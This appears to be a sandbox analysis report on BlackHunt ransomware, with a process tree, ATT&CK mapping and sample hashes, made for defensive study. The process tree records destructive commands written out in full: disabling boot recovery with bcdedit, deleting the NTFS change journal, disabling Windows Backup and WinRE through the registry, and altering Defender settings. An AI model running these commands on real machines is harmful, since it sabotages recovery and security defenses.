C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:11708 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 14604⤵
- Program crash
PID:12568
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:11612
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:8372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:11968
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:12040
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:5348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:5848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4020
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:5396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:5352
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8804
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:8564
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:5180
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6208
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5336 -ip 53361⤵PID:12444
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a98c809deebd297b2c49614c52eaeedc
SHA156ed2d0bbd5feb36f15eeba04ba582b218fd3bc2
SHA256fceb5181fcd75308d38c8862b41be10212328e2b0276552d7e7a3b034c4e3a16
SHA512f89ac7a19be8ca3709860943f1dc5b9e0bd48a5faeee67b897b6f59d9034a3d587b8479b7bb62bc51d8ec3ebefed07b5719a091801e16dac1c04d1d60efba8f1
-
Filesize
12KB
MD543845e1b66251fed7fd3c6074377afec
SHA1f8aa305496d6ec2056fe094866b9d5d62e944b32
SHA2563edf8f73bca0995bb00103fb26baa2f0a107680c95baa5e23d13efbfaee6d654
SHA51222d2829f6941416e338f31be8844b0c41a78d8ff83ba4c2874578f605898cb462716adaba4012762e6857b0bb300484befe739b91d7f5d32034b25ba463e3dc7
-
Filesize
684B
MD559db076bbb2effec8d0cca6ca78dd814
SHA187574b0bb0a0c6fd342d89a8f6aee5d5f4b026db
SHA256597e5c9ff2fda8fd6c60fbb8453aa4c7be9fed7e97d38fd8c185029e9db255c5
SHA51217cb5d4271328525d36b27198a6f4661552b5856a755dfc99a09b760473058caac2d630f1ef54f4b3494a0937b1fdd588f416a421dd3aa11a5b6f85e00647630